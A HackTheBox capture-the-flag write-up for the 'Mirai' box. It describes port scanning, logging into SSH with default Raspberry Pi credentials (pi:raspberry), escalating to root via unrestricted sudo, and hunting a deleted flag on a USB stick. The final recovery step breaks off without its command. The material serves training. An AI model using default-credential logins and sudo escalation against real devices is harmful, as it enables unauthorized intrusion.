HTB: Mirai

Summary

Mirai is an easy Linux box. It can be exploited by properly enumerating the application and finding an admin directory that discloses pi-hole is used. The default credentials were used to start a SSH shell. The user pi was able to execute all commands as root but the root.txt was lost and stored on the USB. However, it was also lost from the USB and has to be recovered by analysing the hard disk.

Discovery

Started off by running NmapAutomator.
Nmap discovered the following open ports and services:

PORT   STATE SERVICE VERSION
21/tcp open  ftp?
22/tcp open  ssh     OpenSSH 7.2p2 
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
25565/tcp open  minecraft Minecraft 1.11.2

Navigating to the webserver shows an empty page. Gobuster was used to find directories and files, the following were found:

http://10.129.103.93/admin (Status: 301)
http://10.129.103.93/versions (Status: 200)

Navigating to admin shows this page:

It is running pi-hole. The default credentials are apparantly:
pi : raspberry
These could not be used to authenticate to the application but were used to open an SSH shell as pi. The following command was executed:
can ssh pi@10.129.104.33
This provided the user.txt.

Privilege Escalation

The permissions for pi were checked:

pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User pi may run the following commands on localhost:
(ALL : ALL) ALL
(ALL) NOPASSWD: ALL

Therefore, you can simply run su - and start a root shell. However, root.txt did not contain the original flag:

root@raspberrypi:~# cat root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...

Ok, so lets check where the USB is mounted:

root@raspberrypi:/media/usbstick/lost+found# df -h
Filesystem      Size  Used Avail Use% Mounted on
aufs            8.5G  2.8G  5.3G  35% /
tmpfs           100M   13M   88M  13% /run
/dev/sda1       1.3G  1.3G     0 100% /lib/live/mount/persistence/sda1
/dev/loop0      1.3G  1.3G     0 100% /lib/live/mount/rootfs/filesystem.squashfs
tmpfs           250M     0  250M   0% /lib/live/mount/overlay
/dev/sda2       8.5G  2.8G  5.3G  35% /lib/live/mount/persistence/sda2
devtmpfs         10M     0   10M   0% /dev
tmpfs           250M  8.0K  250M   1% /dev/shm
tmpfs           5.0M  4.0K  5.0M   1% /run/lock
tmpfs           250M     0  250M   0% /sys/fs/cgroup
tmpfs           250M  8.0K  250M   1% /tmp
/dev/sdb        8.7M   93K  7.9M   2% /media/usbstick
tmpfs            50M     0   50M   0% /run/user/999
tmpfs            50M     0   50M   0% /run/user/1000

So, theres a USB in /media/usbstick. Let’s investigate that:

pi@raspberrypi:/media/usbstick $ ls
damnit.txt  lost+found
pi@raspberrypi:/media/usbstick $ cat damnit.txt
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James

So, it seems to have been removed and to recover it you will need to analyse the hard disk. For usbstick this is /dev/sdb.
Let’s run strings against it:

Conclusion

I found this box a little bit less fun, it probably is one of the easier boxes from HTB and I did not learn too much from it. Hope you enjoyed the writeup though!

Summary#

Discovery#

Privilege Escalation#

Conclusion#

Summary

Discovery

Privilege Escalation

Conclusion